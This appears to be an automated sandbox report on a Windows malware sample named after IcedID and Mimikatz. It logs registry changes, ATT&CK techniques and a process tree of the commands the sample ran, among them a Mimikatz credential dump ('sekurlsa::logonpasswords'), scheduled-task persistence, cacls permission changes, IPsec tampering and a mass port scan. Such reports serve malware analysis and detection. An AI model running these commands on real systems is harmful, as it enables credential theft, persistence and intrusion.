Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iuclszl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wooakm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iuclszl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	202409048385e57d9d5bb1672dd3c941df8e8db2hacktoolsicedidmimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xohudmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qeteblhlu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wpcap.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1396	PING.EXE
4184	cmd.exe

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral2/files/0x000800000002345c-6.dat	nsis_installer_2
behavioral2/files/0x0008000000023471-14.dat	nsis_installer_1
behavioral2/files/0x0008000000023471-14.dat	nsis_installer_2

Modifies data under HKEY_USERS 41 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	teaimmcwl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	teaimmcwl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	teaimmcwl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	teaimmcwl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	teaimmcwl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	teaimmcwl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	teaimmcwl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	teaimmcwl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	teaimmcwl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	teaimmcwl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	iuclszl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	teaimmcwl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	teaimmcwl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	teaimmcwl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	teaimmcwl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	teaimmcwl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	teaimmcwl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	iuclszl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	teaimmcwl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	teaimmcwl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	teaimmcwl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	iuclszl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	iuclszl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	teaimmcwl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	teaimmcwl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	teaimmcwl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	iuclszl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	iuclszl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	teaimmcwl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	teaimmcwl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	teaimmcwl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	teaimmcwl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	teaimmcwl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	teaimmcwl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	teaimmcwl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	teaimmcwl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	teaimmcwl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	teaimmcwl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	teaimmcwl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	teaimmcwl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	teaimmcwl.exe

Modifies registry class 14 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	iuclszl.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1396	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2020	schtasks.exe
4080	schtasks.exe
948	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe

Suspicious behavior: LoadsDriver 15 IoCs

pid	Process
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
2312	202409048385e57d9d5bb1672dd3c941df8e8db2hacktoolsicedidmimikatz.exe

Suspicious use of AdjustPrivilegeToken 22 IoCs

description	pid	Process
Token: SeDebugPrivilege	2312	202409048385e57d9d5bb1672dd3c941df8e8db2hacktoolsicedidmimikatz.exe
Token: SeDebugPrivilege	2128	iuclszl.exe
Token: SeDebugPrivilege	1380	iuclszl.exe
Token: SeDebugPrivilege	4344	vfshost.exe
Token: SeDebugPrivilege	1080	teaimmcwl.exe
Token: SeLockMemoryPrivilege	1396	nqrzsm.exe
Token: SeLockMemoryPrivilege	1396	nqrzsm.exe
Token: SeDebugPrivilege	2748	teaimmcwl.exe
Token: SeDebugPrivilege	3088	teaimmcwl.exe
Token: SeDebugPrivilege	3508	teaimmcwl.exe
Token: SeDebugPrivilege	1252	teaimmcwl.exe
Token: SeDebugPrivilege	4128	teaimmcwl.exe
Token: SeDebugPrivilege	1608	teaimmcwl.exe
Token: SeDebugPrivilege	1968	teaimmcwl.exe
Token: SeDebugPrivilege	4964	teaimmcwl.exe
Token: SeDebugPrivilege	1144	teaimmcwl.exe
Token: SeDebugPrivilege	1800	teaimmcwl.exe
Token: SeDebugPrivilege	5036	teaimmcwl.exe
Token: SeDebugPrivilege	4740	teaimmcwl.exe
Token: SeDebugPrivilege	3032	teaimmcwl.exe
Token: SeDebugPrivilege	208	teaimmcwl.exe
Token: SeDebugPrivilege	1952	teaimmcwl.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
2312	202409048385e57d9d5bb1672dd3c941df8e8db2hacktoolsicedidmimikatz.exe
2312	202409048385e57d9d5bb1672dd3c941df8e8db2hacktoolsicedidmimikatz.exe
2128	iuclszl.exe
2128	iuclszl.exe
1380	iuclszl.exe
1380	iuclszl.exe
5036	xohudmc.exe
3004	wooakm.exe
2016	iuclszl.exe
2016	iuclszl.exe
5392	iuclszl.exe
5392	iuclszl.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2312 wrote to memory of 4184	2312	202409048385e57d9d5bb1672dd3c941df8e8db2hacktoolsicedidmimikatz.exe	85
PID 2312 wrote to memory of 4184	2312	202409048385e57d9d5bb1672dd3c941df8e8db2hacktoolsicedidmimikatz.exe	85
PID 2312 wrote to memory of 4184	2312	202409048385e57d9d5bb1672dd3c941df8e8db2hacktoolsicedidmimikatz.exe	85
PID 4184 wrote to memory of 1396	4184	cmd.exe	87
PID 4184 wrote to memory of 1396	4184	cmd.exe	87
PID 4184 wrote to memory of 1396	4184	cmd.exe	87
PID 4184 wrote to memory of 2128	4184	cmd.exe	94
PID 4184 wrote to memory of 2128	4184	cmd.exe	94
PID 4184 wrote to memory of 2128	4184	cmd.exe	94
PID 1380 wrote to memory of 744	1380	iuclszl.exe	96
PID 1380 wrote to memory of 744	1380	iuclszl.exe	96
PID 1380 wrote to memory of 744	1380	iuclszl.exe	96
PID 744 wrote to memory of 3844	744	cmd.exe	98
PID 744 wrote to memory of 3844	744	cmd.exe	98
PID 744 wrote to memory of 3844	744	cmd.exe	98
PID 744 wrote to memory of 208	744	cmd.exe	99
PID 744 wrote to memory of 208	744	cmd.exe	99
PID 744 wrote to memory of 208	744	cmd.exe	99
PID 744 wrote to memory of 1288	744	cmd.exe	100
PID 744 wrote to memory of 1288	744	cmd.exe	100
PID 744 wrote to memory of 1288	744	cmd.exe	100
PID 744 wrote to memory of 3180	744	cmd.exe	101
PID 744 wrote to memory of 3180	744	cmd.exe	101
PID 744 wrote to memory of 3180	744	cmd.exe	101
PID 744 wrote to memory of 3836	744	cmd.exe	102
PID 744 wrote to memory of 3836	744	cmd.exe	102
PID 744 wrote to memory of 3836	744	cmd.exe	102
PID 744 wrote to memory of 3584	744	cmd.exe	103
PID 744 wrote to memory of 3584	744	cmd.exe	103
PID 744 wrote to memory of 3584	744	cmd.exe	103
PID 1380 wrote to memory of 816	1380	iuclszl.exe	107
PID 1380 wrote to memory of 816	1380	iuclszl.exe	107
PID 1380 wrote to memory of 816	1380	iuclszl.exe	107
PID 1380 wrote to memory of 1268	1380	iuclszl.exe	109
PID 1380 wrote to memory of 1268	1380	iuclszl.exe	109
PID 1380 wrote to memory of 1268	1380	iuclszl.exe	109
PID 1380 wrote to memory of 2140	1380	iuclszl.exe	111
PID 1380 wrote to memory of 2140	1380	iuclszl.exe	111
PID 1380 wrote to memory of 2140	1380	iuclszl.exe	111
PID 1380 wrote to memory of 2608	1380	iuclszl.exe	115
PID 1380 wrote to memory of 2608	1380	iuclszl.exe	115
PID 1380 wrote to memory of 2608	1380	iuclszl.exe	115
PID 2608 wrote to memory of 2652	2608	cmd.exe	117
PID 2608 wrote to memory of 2652	2608	cmd.exe	117
PID 2608 wrote to memory of 2652	2608	cmd.exe	117
PID 2652 wrote to memory of 2964	2652	wpcap.exe	118
PID 2652 wrote to memory of 2964	2652	wpcap.exe	118
PID 2652 wrote to memory of 2964	2652	wpcap.exe	118
PID 2964 wrote to memory of 4104	2964	net.exe	120
PID 2964 wrote to memory of 4104	2964	net.exe	120
PID 2964 wrote to memory of 4104	2964	net.exe	120
PID 2652 wrote to memory of 3648	2652	wpcap.exe	121
PID 2652 wrote to memory of 3648	2652	wpcap.exe	121
PID 2652 wrote to memory of 3648	2652	wpcap.exe	121
PID 3648 wrote to memory of 2072	3648	net.exe	123
PID 3648 wrote to memory of 2072	3648	net.exe	123
PID 3648 wrote to memory of 2072	3648	net.exe	123
PID 2652 wrote to memory of 4236	2652	wpcap.exe	124
PID 2652 wrote to memory of 4236	2652	wpcap.exe	124
PID 2652 wrote to memory of 4236	2652	wpcap.exe	124
PID 4236 wrote to memory of 3776	4236	net.exe	126
PID 4236 wrote to memory of 3776	4236	net.exe	126
PID 4236 wrote to memory of 3776	4236	net.exe	126
PID 2652 wrote to memory of 4836	2652	wpcap.exe	127

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2104
- C:\Windows\TEMP\awlverzbi\nqrzsm.exe
  "C:\Windows\TEMP\awlverzbi\nqrzsm.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1396

C:\Users\Admin\AppData\Local\Temp\202409048385e57d9d5bb1672dd3c941df8e8db2hacktoolsicedidmimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\202409048385e57d9d5bb1672dd3c941df8e8db2hacktoolsicedidmimikatz.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2312
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\bekggbli\iuclszl.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:4184
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1396
- - C:\Windows\bekggbli\iuclszl.exe
    C:\Windows\bekggbli\iuclszl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2128

C:\Windows\bekggbli\iuclszl.exe
C:\Windows\bekggbli\iuclszl.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1380
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3844
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1288
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3836
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3584
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:816
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1268
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2140
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\dvpvfgkqq\vefdcrtiv\wpcap.exe /S
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2608
- - C:\Windows\dvpvfgkqq\vefdcrtiv\wpcap.exe
    C:\Windows\dvpvfgkqq\vefdcrtiv\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2652
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2964
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4104
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3648
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        
        PID:2072
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4236
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3776
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:4836
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3844
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4020
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:116
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:3600
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2340
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:3304
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\dvpvfgkqq\vefdcrtiv\qeteblhlu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\dvpvfgkqq\vefdcrtiv\Scant.txt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1720
- - C:\Windows\dvpvfgkqq\vefdcrtiv\qeteblhlu.exe
    C:\Windows\dvpvfgkqq\vefdcrtiv\qeteblhlu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\dvpvfgkqq\vefdcrtiv\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:3516
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\dvpvfgkqq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\dvpvfgkqq\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:1244
- - C:\Windows\dvpvfgkqq\Corporate\vfshost.exe
    C:\Windows\dvpvfgkqq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4344
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "blssqdfbz" /ru system /tr "cmd /c C:\Windows\ime\iuclszl.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3684
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "blssqdfbz" /ru system /tr "cmd /c C:\Windows\ime\iuclszl.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "declipgtc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bekggbli\iuclszl.exe /p everyone:F"
  2⤵
  PID:1892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4904
